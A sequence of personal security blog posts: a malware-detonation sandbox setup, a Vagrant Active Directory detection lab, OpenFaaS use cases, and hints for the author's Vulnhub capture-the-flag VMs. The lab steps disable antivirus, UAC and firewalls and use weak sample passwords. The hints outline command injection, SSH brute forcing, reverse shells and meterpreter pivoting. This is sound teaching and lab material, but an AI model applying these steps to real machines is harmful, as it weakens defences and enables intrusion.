internet.</p><p>Scripts/Blogs:</p><p>https://daniel.streefkerkonline.com/2017/10/24/mitigate-commodity-malware-attacks-with-windows-firewall-rules/</p><p>https://call4cloud.nl/2020/07/the-windows-firewall-rises/</p><p>https://gist.github.com/ricardojba/ecdfe30dadbdab6c514a530bc5d51ef6#file-windows_hardening-cmd-L497</p><p>https://gist.github.com/jaredhaight/e88b4323adce06395dace501841d3075#file-windows_hardening-cmd-L108</p><p><br /></p><p>I also saw posts where Olaf Hartong was discussing data from sandbox related to malware and LOLBIN/LOLBAS usage and rundll32 as well.</p><p>https://twitter.com/olafhartong/status/1359235339332780034</p><p>https://twitter.com/olafhartong/status/1361415502447267842</p><p><br /></p><p>I thought it would be interesting to collect data on my own and have my own dataset to play with. I also wanted the ability to test malware in an environment where some hardening was applied, such as mentioned in the blog posts and scripts above. In addition to that, I wanted to have the ability to have an EDR agent or AV agent in the same sandbox to see what it collects or alerts on in it's management console. I ended up writing vmexec to help me with this.</p><p>vmexec is similar to cuckoo sandbox and cape sandbox but it doesn't get any information back from the VM's. It just puts the executable in the VM and executes it. When you upload the sample, you can pick a VM or use any available VM and set how long the VM will run for after the sample is uploaded. It uses virtualbox for VM's and just like cuckoo or cape, you need to have an agent inside the VM.</p><p>https://github.com/BoredHackerBlog/vmexec</p><p><br /></p><h2 style="text-align: left;">Design</h2><p>I'll be using Windows 10 VM with various logging enabled and sysmon installed. I'm using sysmon-module rules (https://github.com/olafhartong/sysmon-modular). </p><p>For forwarding logs, I'll be using winlogbeat OSS. (https://www.elastic.co/downloads/beats/winlogbeat-oss) I'm using OSS version because I'll be using Opendistro for elasticsearch elastic and kibana containers. (https://opendistro.github.io/for-elasticsearch/)</p><p>Since I'll be running malware, I'll have to have a second VM for routing the malicious traffic but it's not required if you're okay with threat actors potentially seeing your connections. You can always set up the sandbox VM in a way it doesn't route any traffic as well.</p><p>The network and VM design kinda looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_XFFsG4YaCdsAaCgcQ4oDCzaiQsfZUt_LhXEwXL-O3d1Rip5YMucxxIK8w0TCddXuzJ8pU6Wc9lfzDuVH3c4IhW-k_p-CkRDtrw5hYOpoWJJvuT-TDi6mOndk1dFYLnXnfyurYUi0-lM/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="415" data-original-width="407" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_XFFsG4YaCdsAaCgcQ4oDCzaiQsfZUt_LhXEwXL-O3d1Rip5YMucxxIK8w0TCddXuzJ8pU6Wc9lfzDuVH3c4IhW-k_p-CkRDtrw5hYOpoWJJvuT-TDi6mOndk1dFYLnXnfyurYUi0-lM/w627-h640/image.png" width="627" /></a></div><br /><br /><p></p><h2 style="text-align: left;">Setup</h2><p>Getting all the packages and dependencies:</p><p></p><ol style="text-align: left;"><li>Install Ubuntu 20.04 (although pretty much any Linux OS should work)</li><li>Install Docker (https://get.docker.com/)</li><li>Install docker-compose (https://docs.docker.com/compose/install/)</li><li>Install Virtualbox (https://linuxize.com/post/how-to-install-virtualbox-on-ubuntu-20-04/)</li><li>Make sure python3 and python3-pip are installed</li><ol><li>Might have to run apt install python3 python3-pip</li></ol><li>Install python packages</li><ol><li>Run the commands below:</li><ol><li>pip3 install flask</li><li>pip3 install flask-sqlalchemy</li><li>pip3 install flask-admin</li></ol></ol><li>Download vmexec https://github.com/BoredHackerBlog/vmexec</li><ol><li>if you have git installed you can run:</li><ol><li>git clone https://github.com/BoredHackerBlog/vmexec</li></ol></ol></ol><div><br /></div><div>Getting Elastic and Kibana up and running:</div><p></p><p>I'm using a docker-compose file for elastic and kibana. </p><p><span style="font-family: courier; font-size: x-small;">research@workstation13:~/elk$ cat docker-compose.yml</span></p><p><span style="font-family: courier; font-size: x-small;">version: '3'</span></p><p><span style="font-family: courier; font-size: x-small;">services:</span></p><p><span style="font-family: courier; font-size: x-small;"> odfe-node1:</span></p><p><span style="font-family: courier; font-size: x-small;"> image: amazon/opendistro-for-elasticsearch:1.13.1</span></p><p><span style="font-family: courier; font-size: x-small;"> container_name: odfe-node1</span></p><p><span style="font-family: courier; font-size: x-small;"> environment:</span></p><p><span style="font-family: courier; font-size: x-small;"> - discovery.type=single-node</span></p><p><span style="font-family: courier; font-size: x-small;"> - bootstrap.memory_lock=true # along with the memlock settings below, disables swapping</span></p><p><span style="font-family: courier; font-size: x-small;"> - "ES_JAVA_OPTS=-Xms512m -Xmx512m" # minimum and maximum Java heap size, recommend setting both to 50% of system RAM</span></p><p><span style="font-family: courier; font-size: x-small;"> ulimits:</span></p><p><span style="font-family: courier; font-size: x-small;"> memlock:</span></p><p><span style="font-family: courier; font-size: x-small;"> soft: -1</span></p><p><span style="font-family: courier; font-size: x-small;"> hard: -1</span></p><p><span style="font-family: courier; font-size: x-small;"> nofile:</span></p><p><span style="font-family: courier; font-size: x-small;"> soft: 65536 # maximum number of open files for the Elasticsearch user, set to at least 65536 on modern systems</span></p><p><span style="font-family: courier; font-size: x-small;"> hard: 65536</span></p><p><span style="font-family: courier; font-size: x-small;"> volumes:</span></p><p><span style="font-family: courier; font-size: x-small;"> - odfe-data1:/usr/share/elasticsearch/data</span></p><p><span style="font-family: courier; font-size: x-small;"> ports:</span></p><p><span style="font-family: courier; font-size: x-small;"> - 9200:9200</span></p><p><span style="font-family: courier; font-size: x-small;"> networks:</span></p><p><span style="font-family: courier; font-size: x-small;"> - odfe-net</span></p><p><span style="font-family: courier; font-size: x-small;"> kibana:</span></p><p><span style="font-family: courier; font-size: x-small;"> image: amazon/opendistro-for-elasticsearch-kibana:1.13.1</span></p><p><span style="font-family: courier; font-size: x-small;"> container_name: odfe-kibana</span></p><p><span style="font-family: courier; font-size: x-small;"> ports:</span></p><p><span style="font-family: courier; font-size: x-small;"> - 5601:5601</span></p><p><span style="font-family: courier; font-size: x-small;"> expose:</span></p><p><span style="font-family: courier; font-size: x-small;"> - "5601"</span></p><p><span style="font-family: courier; font-size: x-small;"> environment:</span></p><p><span style="font-family: courier; font-size: x-small;"> ELASTICSEARCH_URL: https://odfe-node1:9200</span></p><p><span style="font-family: courier; font-size: x-small;"> ELASTICSEARCH_HOSTS: https://odfe-node1:9200</span></p><p><span style="font-family: courier; font-size: x-small;"> networks:</span></p><p><span style="font-family: courier; font-size: x-small;"> - odfe-net</span></p><p><span style="font-family: courier; font-size: x-small;"><br /></span></p><p><span style="font-family: courier; font-size: x-small;">volumes:</span></p><p><span style="font-family: courier; font-size: x-small;"> odfe-data1:</span></p><p><span style="font-family: courier; font-size: x-small;"><br /></span></p><p><span style="font-family: courier; font-size: x-small;">networks:</span></p><p><span style="font-family: courier; font-size: x-small;"> odfe-net:</span></p><p><br /></p><p>In the docker-compose.yml file shown above, the data is being stored in odfe-data1 volume. When you take down the containers and bring them up again, the data will not go away. </p><p>Additional information about opendistro for elastic docker container and settings can be found here: https://opendistro.github.io/for-elasticsearch-docs/docs/install/docker/</p><p>Cd into the directory that contains the docker-compose.yml file and run docker-compose up -d to start containers in the background. To take down the containers, you can run docker-compose down from the same directory.</p><p>Once you bring up the containers, elastic will be running on port 9200 and kibana will be on 5601.</p><p><br /></p><p>Setting up Windows 10 Sandbox</p><p style="text-align: left;"></p><ol style="text-align: left;"><li>Create a Windows 10 VM in virtualbox</li><li>Disable updates</li><li>Disable antivirus</li><li>Disable UAC</li><li>Disable anything else that's not needed</li><li>Install whatever applications you need, such as a pdf reader or Office</li><ol><li>If you're using Office (Word or Excel), ensure to allow macros to run automatically (https://support.microsoft.com/en-us/topic/enable-or-disable-macros-in-office-files-12b036fd-d140-4e74-b45e-16fed1a7e5c6)</li></ol><li>Install Python 3+</li><li>Copy agent.py from vmexec project into the VM (do not run it yet)</li></ol><div>These should help with disabling of some things: https://github.com/BoredHackerBlog/LogDetectionLab/blob/main/change_sec_config.bat</div><div><br /></div><div>https://github.com/BoredHackerBlog/loggingstuff/blob/main/loggingstuff.bat</div><div><br /></div><div>Setting up logging and log forwarding:</div><div><ol style="text-align: left;"><li>Download sysmon and install Sysmon with sysmon-module rules (see the loggingstuff.bat link above)</li><li>Enable process auditing and powershell logging (https://redblueteam.wordpress.com/2020/02/08/enable-command-line-and-powershell-audit-for-better-threat-hunting/)</li><li>Download and install winlogbeat oss</li><ol><li>configure winlogbeat oss to forward logs to 192.168.56.1, which is where elastic will be running once we create host-only adapter</li></ol></ol></div><div><br /></div><div><br /></div><div>After the base VM is setup, there are some network modifications that are needed.</div><div><br /></div><div>You will need to create a host-only adapter without dhcp server enabled.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtJ1bBz3LsZYjhPNA5SVHi3czRwSaNrheCL-IMcCd1x_SXMMs33L1erMZFJJHUXUXb_K1NPD7p6xtpRPobGr8-9-1yLnwd-VKFlKmZL9h6E9DV12HMcrgx5uDJHb0aoBlbfr-Hlm8N_w/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="535" data-original-width="899" height="381" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEghtJ1bBz3LsZYjhPNA5SVHi3czRwSaNrheCL-IMcCd1x_SXMMs33L1erMZFJJHUXUXb_K1NPD7p6xtpRPobGr8-9-1yLnwd-VKFlKmZL9h6E9DV12HMcrgx5uDJHb0aoBlbfr-Hlm8N_w/w640-h381/image.png" width="640" /></a></div><br />Enable the second NIC on the VM and attach it to host-only adapter.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIH29LH3ZUEPhu3RUs0vK8bZKmELGfKShDJgvol0oJuKpo0O6B9fvLvzxgiZlWunu-sHHG90fgKPtBUh-PXc-N-PVo-zk_EYaw6m-ff9M0VhuzlW5AsiQckQL_J1Kt8E7AXFDvIlrgMS0/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="261" data-original-width="611" height="274" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIH29LH3ZUEPhu3RUs0vK8bZKmELGfKShDJgvol0oJuKpo0O6B9fvLvzxgiZlWunu-sHHG90fgKPtBUh-PXc-N-PVo-zk_EYaw6m-ff9M0VhuzlW5AsiQckQL_J1Kt8E7AXFDvIlrgMS0/w640-h274/image.png" width="640" /></a></div><br />Set the first NIC/adapter to NAT or internal network or whatever else. I have mine setup to internal network going to my router.</div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbzkWJ-RukRcfIiB8Y8TGVj0TUEuxIx5CVXrWiKQ1CB8-PdelTN8wgAPmfmZKmwUGFbrUYlzjeFdWk0D8da1U9kmjFNwl74H2ul42aEQCQrB_cJ85LDznJgkvZN8YLsnAK8GG_FdwN_AQ/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="234" data-original-width="597" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbzkWJ-RukRcfIiB8Y8TGVj0TUEuxIx5CVXrWiKQ1CB8-PdelTN8wgAPmfmZKmwUGFbrUYlzjeFdWk0D8da1U9kmjFNwl74H2ul42aEQCQrB_cJ85LDznJgkvZN8YLsnAK8GG_FdwN_AQ/w400-h156/image.png" width="400" /></a></div><br />Finally, turn on the VM, set a static IP for the adapter in Windows. Since my vboxnet0 host-only adapter is using 192.168.56.1/1 I set my IP to 192.168.56.2.</div><div><br /></div><div>Reboot the VM, login and run agent.py and take a snapshot while the VM is running. Note the IP address, snapshot name, and VM name.</div><div><br /></div><div>Setting up vmexec</div><div>in app.py, just search for #CHANGEME and modify the settings there.</div><p></p><p>You'll want to add your VM like this:</p><p>db.session.add(VMStatus(name="winVM",ip="10.0.0.178",snapshot="Snapshot2", available=True))</p><p>name is the name you gave your VM in virtualbox, IP is the static IP that was assigned, and snapshot is the snapshot you're utilizing.</p><p><br /></p><h2 style="text-align: left;">Usage</h2><p>To start using vmexec, you need the docker containers for elastic and kibana running (cd into the directory with your docker-compose.yml file and type docker-compose up -d), you need your router VM up and running. You can just start the VM. Finally, you need to start vmexec. cd into the vmexec directory and type flask run -h 0.0.0.0 (if you want to remotely access the web server) the web server will be running on port 5000.</p><p>the webui looks like this:</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz2qAxoxzBcWu3lhXfo923GrVZ7bMNFYsURutRdVhBrJHh_ExhIxvGD_4qG54ivdxShHzns1zdjaKN4xaxIZ-q-Kr74WdRzt5BbA6RLrMFFoBfBoRgqzLezHN3dRRhNyYp8nbbnmNf1s/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="116" data-original-width="336" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXz2qAxoxzBcWu3lhXfo923GrVZ7bMNFYsURutRdVhBrJHh_ExhIxvGD_4qG54ivdxShHzns1zdjaKN4xaxIZ-q-Kr74WdRzt5BbA6RLrMFFoBfBoRgqzLezHN3dRRhNyYp8nbbnmNf1s/" width="320" /></a></div><br />You can select and upload a file, select a specific VM from the dropdown menu (optional), and change the VM run time and click the submit button.<p></p><p><br /></p><p>You can access kibana on port 5601 via web browser. Make sure to setup your index pattern. It should be winlogbeat-*.</p><p><br /></p><p>In kibana you can search for the executable file that was ran and look at surrounding events. With sysmon-modular rules, you can also match events with mitre framework.</p><p></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZLb4U0yc5-HoqVvgcEDx25Fy1Y-lVNalmrFJ4qgT8XmasPMZwdVJHijHE8fU4LlKnOF5m6SVd9vZfAMQC34BkrenTAg91R0UPd78wUQsCcuj9_Qlo7v-t1iffcjOdAqIobwhB8-Mz94o/" style="margin-left: 1em; margin-right: 1em;"><img data-original-height="471" data-original-width="1053" height="286" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgZLb4U0yc5-HoqVvgcEDx25Fy1Y-lVNalmrFJ4qgT8XmasPMZwdVJHijHE8fU4LlKnOF5m6SVd9vZfAMQC34BkrenTAg91R0UPd78wUQsCcuj9_Qlo7v-t1iffcjOdAqIobwhB8-Mz94o/w640-h286/image.png" width="640" /></a></div><br /><br /><p></p><p><br /></p><h2 style="text-align: left;">Modifying the project</h2><p>Modifying the project is easy depending on your needs. Agent.py can be modified easily if you would like to upload files to specific location or execute/open them in a certain way. There could be code added in vm_process function as well if additional steps need to be taken before running the VM or the file or after.</p><p><br /></p><h2 style="text-align: left;">Resources</h2><p>https://cuckoosandbox.org/</p><p>https://github.com/kevoreilly/CAPEv2</p><p>https://github.com/BoredHackerBlog/capev2-virtualbox-install</p><p>https://github.com/BoredHackerBlog/vmexec</p><p>https://www.docker.com/</p><p>https://opendistro.github.io/for-elasticsearch/</p><p>https://www.elastic.co/downloads/beats/winlogbeat-oss</p><p>https://github.com/olafhartong/sysmon-modular</p><p>https://www.virtualbox.org/</p><p><br /></p><p><br /></p>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-79957371760158839892021-01-30T11:40:00.000-08:002021-01-30T11:40:00.011-08:00Creating an Active Directory (AD) lab for log-based detection research and development with Vagrant, Humio, and AtomicRedTeam<h2 style="text-align: left;">introduction</h2><div>Few years or months ago, I came across DetectionLab project and thought it was neat. It would let me conduct attacks and let me work on detection rules and also let me test detection rules. DetectionLab uses Splunk for storing logs which I'm not used to and it also requires a lot of system resources my machine doesn't have. </div><div><br /></div><div>I then came across DetectionLabELK, which is similar to DetectionLab but uses ELK stack, which I am familiar with but I have the same issue with system requirements and not needing some of the components of the project. DetectionLabELK people (CyberDefenders) provide a cloud version of it which is very cheap if you wanted to utilize it for testing things but I still wanted to have something on my own machine.</div><div><br /></div><div>I did build an AD lab manually, however, after not taking snapshots and breaking the lab, I decided that I should just use Vagrant.</div><div><br /></div><div>For my lab needs, I just need to look at logs and not network traffic. I also just need one DC, one Workstation, and a Kali VM. I'm very familiar with using Humio so I decided to use Humio cloud (free) account to store and search my logs. Kali is good for doing certain attacks but I also wanted AtomicRedTeam so I could use that for generating log data and testing queries. The AD lab I made was also inspired by Applied Purple Teaming course and TheCyberMentor ethical hacking course.</div><div><br /></div><h2 style="text-align: left;">design</h2><div>Domain: testlab.local</div><div>Computers: dc1 - 192.168.200.11 - windows server 2019 desktop</div><div>workstation1 - 192.168.200.12 - windows 10</div><div>kali - no IP initially, you have to set it to 192.168.200.13 - kali linux</div><div><br /></div><div>Users:</div><div>local user: vagrant / vagrant works on all machines</div><div>domain users: </div><div>jsmith / Password123</div><div>jdoe / 123Password</div><div>SQLService / Servicepass123</div><div><br /></div><div>all domain users are in domain admins group, administrators group, and enterprise admins group.</div><div><br /></div><div>jsmith is a local admin on workstation1</div><h2 style="text-align: left;">setup</h2><div>system requirements:</div><div>any modern 4 core 8 thread CPU should be fine. I'm using i7-6700HQ.</div><div>around 16GB of RAM should work fine as well.</div><div><br /></div><div>virtualbox download and installation:</div><div>Download and install virtualbox from here: <a href="https://www.virtualbox.org/wiki/Downloads">https://www.virtualbox.org/wiki/Downloads</a></div><div>Install Oracle VM VirtualBox Extension Pack as well.</div><div><br /></div><div>vagrant download and installation:</div><div>Download and install vagrant from here: https://www.vagrantup.com/downloads</div><div>Once vagrant is installed, open command line and run: "vagrant plugin install vagrant-reload" to install the reload plugin. More info here: <a href="https://github.com/aidanns/vagrant-reload">https://github.com/aidanns/vagrant-reload</a></div><div><br /></div><div>downloading the github project:</div><div>Code/scripts are here: <a href="https://github.com/BoredHackerBlog/LogDetectionLab">https://github.com/BoredHackerBlog/LogDetectionLab</a></div><div>Download the zip and unzip it or run git clone <a href="https://github.com/BoredHackerBlog/LogDetectionLab">https://github.com/BoredHackerBlog/LogDetectionLab</a></div><div><br /></div><div>setting up humio:</div><div>Get a Humio account and login at <a href="http://cloud.humio.com">cloud.humio.com</a></div><div>Go to <a href="https://cloud.humio.com/sandbox/settings/ingest-tokens">https://cloud.humio.com/sandbox/settings/ingest-tokens</a></div><div>Create a new token for this project. You can leave the parser as None. Copy the token.</div><div>Edit winlogbeat.yml file and change the password to your token.</div><h2 style="text-align: left;">usage</h2><div>Vagrant command line guide: <a href="https://www.vagrantup.com/docs/cli">https://www.vagrantup.com/docs/cli</a></div><div><br /></div><div>Open command prompt and cd into the LogDetectionLab folder.</div><div>Type vagrant up to bring up all 3 virtual machines.</div><div>Your initial run will download the VM boxes and set everything up. This may take 30 minutes to an hour. </div><div><br /></div><div>Once all the machines are up and running and vagrant command exits in command prompt, you will need to login into kali linux VM and change eth1 IP to 192.168.200.13.</div><div><br /></div><div>You will have to disable Defender on workstation1 and install invoke-atomicredteam manually (check github page for bugs).</div><div><br /></div><div>For using invoke-atomicredteam, you will need to open powershell and run: Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force</div><div><br /></div><div>You can also do vagrant up MACHINENAME, such as vagrant up dc1.</div><div><br /></div><div>To tear down the lab, you need to run vagrant destroy -f. This will shutdown the VMs and remove them.</div><div><br /></div><div>Vagrant also supports making snapshots and you can read more about that here: <a href="https://www.vagrantup.com/docs/cli/snapshot">https://www.vagrantup.com/docs/cli/snapshot</a></div><h2 style="text-align: left;">modifying the project</h2><div>Vagrantfile - this can be changed to modify VM cpu and memory resources, how port forwarding works, hostname, ip address, and scripts that run.</div><div><br /></div><div>install-dc.ps1 - domain controller promotion script</div><div><br /></div><div>join-domain.ps1 - joins the computer to the domain and adds jsmith as a local admin</div><div><br /></div><div>create-users.ps1 - creates users on the dc</div><div><br /></div><div>create-smbshare.ps1 - create an smb share on the dc</div><div><br /></div><div>change_ui.ps1 - changes some Windows setting so ui is adjusted to best performance</div><div><br /></div><div>change_sec_config.bat - disable updates, disable firewall, disable defender, disable uac, and enable rdp</div><div><br /></div><div>install-atomicredteam.ps1 - installs invoke-atomicredteam</div><div><br /></div><div>enable_logging.bat - enables a bunch of logging stuff, installs sysmon with olafhartong config, and downloads winlogbeat</div><div><br /></div><div>winlogbeat.yml - winlogbeat config file, you'll have to edit this to change where the logs go also as you start seeing event id's that are not useful, you can just edit this to remove them or modify enable_logging.bat to avoid enabling certain events.</div><div><br /></div><div>setup_winlogbeat.bat - sets up winlogbeat</div><h2 style="text-align: left;">challenges</h2><div>I kept getting errors after I promoted the domain controller then tried to reboot. Errors were related to winrm. I added </div><div><div> config.winrm.transport = :plaintext</div><div> config.winrm.basic_auth_only = true</div></div><div><br /></div><div>and</div><div><br /></div><div>executed "reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /d 0 /t REG_DWORD /f /reg:64" before promoting and that seemed to fix this issue.</div><div><br /></div><div>At the time of posting this blog post, I'm having an issue with workstation1 not installing atomicredteam correctly. AV doesn't get turned off for some reason.</div><div><br /></div><div>I can't change IP address on kali through vagrant. </div><div><br /></div><div>me typing vagrant destory -f for 10 minutes trying to figure out why it didn't work was also challenging. </div><h2 style="text-align: left;">resources</h2><div><a href="https://github.com/clong/DetectionLab">https://github.com/clong/DetectionLab</a></div><div><a href="https://cyberdefenders.org/">https://cyberdefenders.org/</a></div><div><a href="https://github.com/cyberdefenders/DetectionLabELK">https://github.com/cyberdefenders/DetectionLabELK</a></div><div><a href="https://github.com/jckhmr/adlab">https://github.com/jckhmr/adlab</a></div><div><a href="https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course">https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course</a></div><div><a href="https://defensiveorigins.com/">https://defensiveorigins.com/</a></div><div><a href="https://defensiveorigins.com/trainings/">https://defensiveorigins.com/trainings/</a></div><div><a href="https://www.blackhillsinfosec.com/training/applied-purple-teaming-training/">https://www.blackhillsinfosec.com/training/applied-purple-teaming-training/</a></div><div><a href="https://app.vagrantup.com/StefanScherer">https://app.vagrantup.com/StefanScherer</a></div><div><a href="https://app.vagrantup.com/kalilinux/boxes/rolling">https://app.vagrantup.com/kalilinux/boxes/rolling</a></div><div><a href="https://github.com/redcanaryco/atomic-red-team">https://github.com/redcanaryco/atomic-red-team</a></div><div><a href="https://atomicredteam.io/">https://atomicredteam.io/</a></div><div><a href="https://github.com/redcanaryco/invoke-atomicredteam">https://github.com/redcanaryco/invoke-atomicredteam</a></div><div><a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon">https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon</a></div><div><a href="https://github.com/olafhartong/sysmon-modular">https://github.com/olafhartong/sysmon-modular</a></div><div><a href="https://www.humio.com/">https://www.humio.com/</a></div><div><br /></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-33443756954280867492020-07-05T12:11:00.005-07:002020-07-05T12:11:58.460-07:00Openfaas and infosec uses<b>OpenFaaS:</b><br />
<br />
OpenFaaS is a function as a service project that can be self-hosted, much like AWS Lambda or Google Functions. Essentially, instead of writing a full project that does various things, you write and maintain functions instead. OpenFaaS can be deployed with Docker Swarm, Kubernetes, and OpenShift.<br />
<br />
OpenFaaS documentation is pretty clean and easy to understand. To use it, you need either Docker Swarm, Kubernetes, or OpenShift. Once you deploy OpenFaaS, you need to create a function and deploy it. There are several ways to supply data to the function, one of them is via http requests.<br />
<br />
You can use function in sync or async way, without modifying any code at all. You just modify the URL you're sending the http requests too. In addition to that, OpenFaaS will do scaling on its own. If you're using a function a lot and OpenFaaS will spin up containers for that specific function automatically. It's also possible to utilize ci/cd with OpenFaaS to ensure that deploying changes to functions is easy and quick.<br />
<br />
I've been mainly experimenting with OpenFaaS on Vultr but it's also possible to play with it in Docker Playground.<br />
<br />
<b>Infosec use cases:</b><br />
<br />
I looked through some of my past projects and I can see myself using OpenFaaS if I were to rewrite them. For example, file analysis. It is possible to combine OpenFaaS with other technologies such as Redis (to keep track of operations) and Minio (to allow download/upload of files/artifacts inside of functions) to analyze malicious files or extract metadata from files. In addition to this, you can also implement machine learning and analyze features of a bunch of PE files in a function and return info about if they are malicious or not.<br />
<br />
Another use case is analyzing phishing links. I wrote a golang project that takes links from phishtank and splits them into more URLs recursively and checks each URL to see if there is an open directory. It's possible to completely implement this with OpenFaaS. For example, you can send phishtank data to OpenFaaS function every 8 hours and split each link into multiple URLs, send URLs to another function to detect open directory, finally send the URLs that have open directory to another function that downloads files (this would be phishing kit zip files in most cases) from the open directory.<br />
<br />
Log analysis or enrichment is another use case. For example, if you were receiving logs about remote sign-ins, you could send the logs in batches or individually to a function or functions to extract IP and do log enrichment based on API lookups for the IP or finding geolocation.<br />
<br />
OpenFaaS can be useful for doing analysis of forensic artifacts. If you're working an incident and need to analyze artifacts from hundreds of computers, you can collect the evidence, throw it in Minio, have a bunch of functions to analyze the evidence, maybe even send the output to another set of functions for enrichment before sending the final evidence to storage or SIEM.<br />
<br />
<br />
<br />
I discovered the OpenFaaS project earlier this month and it has been fun to play with and I can see myself using it a lot. Being able to deploy and maintain specific functions instead of a huge application is much easier for me. Also not having to write code that's threaded and OpenFaaS doing automated scaling is very nice.<br />
<br />
<b>Links:</b><br />
<br />
<a href="https://www.openfaas.com/">https://www.openfaas.com/</a><br />
<a href="https://docs.openfaas.com/deployment/">https://docs.openfaas.com/deployment/</a><br />
<a href="https://docs.openfaas.com/reference/triggers/">https://docs.openfaas.com/reference/triggers/</a><br />
<a href="https://docs.openfaas.com/reference/async/">https://docs.openfaas.com/reference/async/</a><br />
<a href="https://docs.openfaas.com/reference/cicd/intro/">https://docs.openfaas.com/reference/cicd/intro/</a><br />
<a href="https://www.vultr.com/docs/deploying-openfaas-using-docker-swarm">https://www.vultr.com/docs/deploying-openfaas-using-docker-swarm</a><br />
<a href="https://docs.openfaas.com/deployment/play-with-docker/">https://docs.openfaas.com/deployment/play-with-docker/</a><br />
<a href="https://redis.io/">https://redis.io/</a><br />
<a href="https://min.io/">https://min.io/</a><br />
<a href="https://www.phishtank.com/">https://www.phishtank.com/</a><br />
<a href="https://blog.alexellis.io/openfaas-storage-for-your-functions/">https://blog.alexellis.io/openfaas-storage-for-your-functions/</a><br />
<a href="https://youtu.be/XiagsmRVoNY">https://youtu.be/XiagsmRVoNY</a><br />
<br />
<a href="https://www.vultr.com/?ref=7127410">https://www.vultr.com/?ref=7127410</a> (Affiliate link...)Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8341113811870246566.post-17163767592179061352020-04-25T16:57:00.004-07:002020-04-25T16:57:59.581-07:00Vulnhub VMs and guide/hintsI released some VM's on Vulnhub almost a month ago.<div>
<br /></div>
<div>
Link to the VMs: <a href="https://www.vulnhub.com/series/boredhackerblog,295/">https://www.vulnhub.com/series/boredhackerblog,295/</a></div>
<div>
<br /></div>
<div>
This post has guide/hints for those VM's.</div>
<div>
<br /></div>
<div>
<div>
<b>Cloud Antivirus/Cloud AV:</b></div>
<div>
<div>
1. Start by port scanning your network and locate the Easy Cloud AV VM’s IP address.</div>
<div>
a. Port 22 and 8080 should be open and the MAC address should be: 08:00:27:BA:A5:BA</div>
<div>
2. Do an Aggressive nmap scan on the target IP address and find out what services are running.</div>
<div>
3. Visit the web server running on the target IP</div>
<div>
4. You were not provided an Invite code. Bypass the Invite code page.</div>
<div>
a. Input data in the invite form field to cause an error on the web server</div>
<div>
b. Read the error messages and craft input to bypass the invite code page</div>
<div>
5. Get command line injection on the scanner page</div>
<div>
a. Based on scanner output, determine what the input could have been</div>
<div>
b. Inject your own commands</div>
<div>
c. To make sure command execution works, cat /etc/hostname</div>
<div>
i. Output from it will be “cloudav”</div>
<div>
6. Gather information about the users</div>
<div>
a. View linux files that could contain user information</div>
<div>
7. Brute force port 22/SSH</div>
<div>
a. Use the gathered usernames to build a list of usernames and passwords</div>
<div>
b. Use the list for brute forcing port 22/SSH</div>
<div>
8. Examine home directory of users and exploit vulnerable application to get root</div>
<div>
a. Examine the left behind source code</div>
<div>
b. Determine how to inject commands</div>
<div>
c. Inject commands to gain root privileges!</div>
</div>
</div>
<div>
<br /></div>
<div>
<div>
<b>Socnet/social network:</b></div>
<div>
Goal: Get root privilege on the machine (hostname: socnet)</div>
<div>
1. Start by port scanning. Locate socnet VM’s IP address.</div>
<div>
a. Port 22 and 5000 should be open. Mac address should be: 08:00:27:A6:E2:EC</div>
<div>
2. Do an aggressive nmap scan on the target IP and find out which services are running</div>
<div>
3. Visit the webpage on the target IP</div>
<div>
a. Examine it for any vulnerabilities</div>
<div>
4. Use dirb to scan the website for hidden pages</div>
<div>
5. Use the input on the hidden page to test code</div>
<div>
a. https://www.geeksforgeeks.org/exec-in-python/</div>
<div>
b. Try Python’s time.sleep module and see if website will take sleep and take longer to</div>
<div>
respond. Try 5 second sleep then 10 second sleep to observe different response times.</div>
<div>
6. Abuse to the code testing functionality to get a reverse shell</div>
<div>
a. http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</div>
<div>
7. Setup a more stable reverse shell with meterpreter</div>
<div>
a. https://netsec.ws/?p=331</div>
<div>
b. Create the reverse shell binary</div>
<div>
c. Transfer the binary to target machine using a webserver on the attacker machine and</div>
<div>
running wget on the target machine</div>
<div>
d. Use metasploit to handle meterpreter reverse shell</div>
<div>
8. Utilize the ‘arp’ command in meterpreter to look for other machines on the target network</div>
<div>
9. Utilize the ‘ifconfig’ command in meterpreter to get targets network information</div>
<div>
10. Using metasploit, setup a route via meterpreter session</div>
<div>
11. Utilize auxiliary/scanner/portscan/tcp to scan other machines on the target network</div>
<div>
12. Google open ports and find out what they’re used for</div>
<div>
13. Utilize meterpreter session to do port forwarding from your local machine to the machine with</div>
<div>
